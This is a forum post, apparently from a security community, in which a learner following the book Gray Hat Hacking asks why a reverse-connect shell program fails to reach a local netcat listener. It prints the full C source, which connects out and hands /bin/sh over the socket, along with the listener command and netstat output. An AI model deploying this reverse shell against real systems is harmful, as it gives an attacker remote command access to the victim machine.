Results 1 to 4 of 4

Thread: Writing some shellcode, need a little help

Threaded View

  1. #1
    Junior Member g3ksan's Avatar
    Join Date
    Jan 2010
    Location
    Florida
    Posts
    93

    Default Writing some shellcode, need a little help

    Hey guys,

    I'm working through Gray Hat Hacking and I'm trying to write the reverse connect shellcode example in the book.

    The code originally had serv_addr.sin_addr.s_addr=0x650A0A0A; in it, which is 10.10.10.101. I figured it might be part of the environment in the book, so I changed it to 0x100000F7;, which is 127.0.0.1.

    The book has me run a netcat session as "nc -nlvv -p 49059" and then run the program, which should just connect to the netcat session. nc just sits there, and the program just sits there. When I do a netstat to see what's going on, I get:

    Code:
    #
    tcp        0      0 0.0.0.0:48059           0.0.0.0:*               LISTEN      15795/nc        
    #
    tcp        0      1 192.168.1.69:55624      247.0.0.16:48059        SYN_SENT    16187/reverse_conne
    Which is an external IANA reserved IP. When I change the code to reflect the book, it goes out to the proper IP that I hardcoded, which is 10.10.10.101 and when I hardcode my wlan0's IP, it goes out to 12.138.16.84 which is owned by ATT. When I turn off the internet, the code just exits.

    The book does not provide an environment to code in like Art of Exploitation does, so I'm trying it in BT4. I'm pretty much dumbfounded at this point, I'm not even sure how to troubleshoot this further. I understand if this is considered off topic.

    Thanks in advance!

    Source is below:

    Code:
    #include<sys/socket.h>
    #include<netinet/in.h>
    
    int main()
    {
    	char * shell[2];
    	int soc,remote;
    	struct sockaddr_in serv_addr;
    
    	serv_addr.sin_family=2;
    	serv_addr.sin_addr.s_addr=0x100000F7;
    	serv_addr.sin_port=0xBBBB;
    	soc=socket(2,1,0);
    	remote = connect(soc, (struct sockaddr*)&serv_addr, 0x10);
    	dup2(soc,0);
    	dup2(soc,1);
    	dup2(soc,2);
    	shell[0]="/bin/sh";
    	shell[1]=0;
    	execve(shell[0],shell,0);
    }
    Last edited by g3ksan; 07-22-2010 at 02:58 AM. Reason: forgot to write that source was below, etc.

Similar Threads

  1. English Shellcode
    By Gitsnik in forum OLD General IT Discussion
    Replies: 0
    Last Post: 11-24-2009, 04:01 AM
  2. Problems with shellcode
    By Seppel_S in forum OLD Pentesting
    Replies: 1
    Last Post: 10-30-2009, 02:19 PM
  3. bindshell shellcode
    By kalyanboga in forum OLD Pentesting
    Replies: 7
    Last Post: 08-14-2009, 07:50 AM
  4. Shellcode help- hex to opcode
    By Siph0n in forum OLD Tutorials and Guides
    Replies: 0
    Last Post: 05-26-2008, 06:25 PM
  5. shellcode help
    By godlike in forum OLD Newbie Area
    Replies: 1
    Last Post: 02-15-2008, 06:07 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •